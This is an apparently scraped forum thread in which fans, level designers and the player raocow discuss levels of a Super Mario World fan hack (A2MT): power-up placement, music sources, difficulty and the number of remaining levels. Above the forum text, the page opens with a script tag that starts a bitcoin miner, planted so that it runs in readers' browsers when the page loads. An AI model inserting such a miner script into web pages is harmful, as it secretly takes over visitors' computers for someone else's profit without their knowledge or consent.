<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmw central

A Second Mario Thing: free alex

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Paragraph

Re: A Second Mario Thing: but I just can't

Postby Paragraph » 5 years ago

It is very well done how the first part encourages you to rush through the obstacles (and the level design actually allows it) while the second part forces you to wait UNLESS YOU RUSH (if I interpreted the timing of the moving pipes correctly), so it's like a mini-tutorial inside the level: at the start, the designer tells you that in his level, it's okay to move it, and at the end, the level becomes far easier/flows better if you understand that lesson.

SyStemkraSh5642

Postby SyStemkraSh5642 » 5 years ago

Quite a coincidence that raocow played my last level on my birthday.

Well, I hope it was enjoyable. There are power-up blocks in the beginning, placed in the bottom row where I thought it was the safest. As for inconvenience, I always tried to plan an escape route in case the player was trapped.

Location of other two blocks/playthrough: https://www.youtube.com/watch?v=OcTe_dTF-k4

I never thought about rushing through the level, which is funny because I was trying to make the level slow down the player as much as possible.

Also, there's no chest. I'm not sure what my thought process was, but I either forgot about it, or I thought it didn't belong in a level like this.

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

Hmm. Three deaths before the two minute mark. Is that some kind of new record?

Powerup issues that everyone else addressed already aside, that level actually looked pretty neat. Straightforward, no gimmicks to speak of, just pure old-school platforming. I approve. Anyone know what song was used in that stage, though? I swear I've heard it before, but I can't quite place it offhand.

Yesterday's stage, since I forgot to post... I kinda hovered somewhere between liking it, and not. The coin collection thing was arbitrary, some enemies were in *really* bad spots (especially the kicking koopa, which was *completely off screen*, in the second half), and some of the jumps were pretty silly... but I *loved* the aesthetics. I was a *huge* fan of the Pitfall 2600 games as a kid, and hearing that Pitfall 2 medley, played over a stage based on the original Pitfall, really brought a smile to my face. Kind of a shame that the gold bars and diamond rings were just for show. And I kinda hoped Quickclaw the Lion would make a cameo somewhere, but alas. Still, one of the more memorable stages overall.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

SyStemkraSh5642

Postby SyStemkraSh5642 » 5 years ago

YelseyKing wrote:Anyone know what song was used in that stage, though? I swear I've heard it before, but I can't quite place it offhand.
Custom music for A2MT, made by Chrom1um.
SMW Custom Music - A2MT Snow Theme (Original by Chrom1um)

YelseyKing

SyStemkraSh5642 wrote:
YelseyKing wrote:Anyone know what song was used in that stage, though? I swear I've heard it before, but I can't quite place it offhand.
Custom music for A2MT, made by Chrom1um.
SMW Custom Music - A2MT Snow Theme (Original by Chrom1um)
Huh. I could've sworn I'd heard that in some game. Must have some similar parts to some other song or something. Still, it is indeed a pretty great song. Thanks for the info.

Moists:

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

Can't someone who knows these things tell raocow in advance when there's no chest or some other level oddity?

shdwdrgnix

Postby shdwdrgnix » 5 years ago

Originally, I wanted to block off the door path with brown blocks, but I wanted to give players a chance to see what they needed to do in that part and it adds in a shortcut for a TAS. The P-switch was found at the top of the chain climbing area, while the intended way to get the chest was to enter the boss room big to be able to enter that pipe with a blue block. It would take you right next to the vine block. As for the the rest of the level, it was mostly inspired by the more large scale VIP levels.

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 5 years ago

shdwdrgnix wrote:The P-switch was found at the top of the chain climbing area, while the intended way to get the chest was to enter the boss room big to be able to enter that pipe with a blue block.
Asking the player to go through the same auto scrolling area twice feels bit much. This level was too long/difficult looking for me. There was little to no margin for error in parts. Most of raocow's deaths seem to be from the slipperiness and tight jumps. I do like how expansive this level was though and how it used some long hallways with good enemy placement. Sparks on that one area were clever too.

MonkeyShrapnel
Poke a Man
First name: Brian
Pronouns: he/him/his

Postby MonkeyShrapnel » 5 years ago

It was interesting to see raocow figuring out how to enter that floating door but the level felt too long and had little room for error. None-the-less, the level did have some cool ideas, so whoever the heck you are shdwdrgnix, good try.
Uh...Do I just sign here? What do you mean it should be obvious? There are people in this world...well...a whole lot of people that can't follow basic instructions!

My silly "Collab" Youtube channel https://www.youtube.com/user/Theguyswho ... s/featured
(That means I'm the only person using it nowadays.)

shdwdrgnix

Willhart wrote: Asking the player to go through the same auto scrolling area twice feels bit much.
Originally, I wanted the blue blocks to be in the mid-point area , but it felt more bothersome to bring it past the first auto-scroll section

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 5 years ago

I don't know what it was, but something made this level mush less fatiguing to watch than other A2MT levels of similar length.

Mikkofier
What about Ron magic?
First name: Mikko J. Fuzzygrumbles
Pronouns: he/him/his

Postby Mikkofier » 5 years ago

How many levels are left?
Many people need desperately to receive this message: I feel and think much as you do, care about many of the things you care about, although most people do not care about them. You are not alone.
-Kurt Vonnegut
Context-free Supper Mario Broth Roulette! NOTE: Potential Jumpscare warning!
Avatar source (for most of them).

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 5 years ago

Well let's see.

Tomorrow I play the level that should have been on that empty spot. Then there are two levels left on the map. Then the last switch palace (might be two videos). Then the two levels for the last world. Then the final level (might be more than one video).

Then the postgame (two levels, one is mine and I'll probably savescum it, and another that will probably take more than one video)

I don't think I'm forgetting anything, and this is assuming I don't do some levels that wheren't finished 'in time' or whatever.
the chillaxest of dragonsImage
ImageImage

YelseyKing

raocow wrote:Then the postgame (two levels, one is mine and I'll probably savescum it, and another that will probably take more than one video)
Is your level "Further Over There"? Because I tried it in the fish market ROM... I died like five times. On the first set of obstacles. I fail at A2MT. :P

Moists:

sedron
im proud of you kid

Postby sedron » 5 years ago

Can anyone tell me what the song used in the chest area for this level was? 'Cause I think it's pretty cool.

shdwdrgnix

sedron wrote:Can anyone tell me what the song used in the chest area for this level was? 'Cause I think it's pretty cool.
Irwin on reflection from Legend of Mana

Awakenyourmind
Muwha!

Postby Awakenyourmind » 5 years ago

Kinda surprised I didnt get any love for creating half of tentas level XD

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 5 years ago

I had no idea!
the chillaxest of dragonsImage
ImageImage

Awakenyourmind
Muwha!

Postby Awakenyourmind » 5 years ago

raocow wrote:I had no idea!
You asked me personally to help him with his level awhile back. XD
Last edited by Awakenyourmind on 03 Aug 2014, 14:16, edited 1 time in total.

Terry van Feleday

Postby Terry van Feleday » 5 years ago

Say, where could I find a link to the fishmarket version of the game? The first post only has the OW one.

Mineyl

Postby Mineyl » 5 years ago

sedron wrote:Can anyone tell me what the song used in the chest area for this level was? 'Cause I think it's pretty cool.
If you liked that unassuming little SMW port, you should check out the REAL version of the song: https://www.youtube.com/watch?v=f9-0QTDyjO4

It's always swell having uncle raocow read the French to us! The level was...okay, but yet another abuser of those weird homing bullet bills and shelless blue goopas. And of course, nothing would be complete without the ice physics! Heck yeah!
raocow wrote:I'm feeling so smug I'm gonna' stare at myself in the mirror for 23 hours!

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 5 years ago

The background was nice. It's interesting, how those outlines become less noticeable when playing. Some parts used those boomerang bullets really well.

sedron
im proud of you kid

Postby sedron » 5 years ago

Mineyl wrote: If you liked that unassuming little SMW port, you should check out the REAL version of the song: https://www.youtube.com/watch?v=f9-0QTDyjO4
It's really cool how the port and the original feel so different. Calling the SMW port "unassuming," is pretty accurate, and I think that's part of what gives it some charm. I could see it being used in an end-game level, or maybe the penultimate hallway of the final level. You'd get a calm-before-the-storm type thing going.

Meanwhile, the original, through it's more bombastic instrumentation, is a much stronger piece overall. It works much better as a gameplay/story crescendo than the port. It fits for a boss much better than the port, as well.

It's just such a cool song either way. I love it. =D

Mabel
Just west of wierd

Postby Mabel » 5 years ago

yall got some wierd obsession with ice physics man
Image Image

Return to “let's play”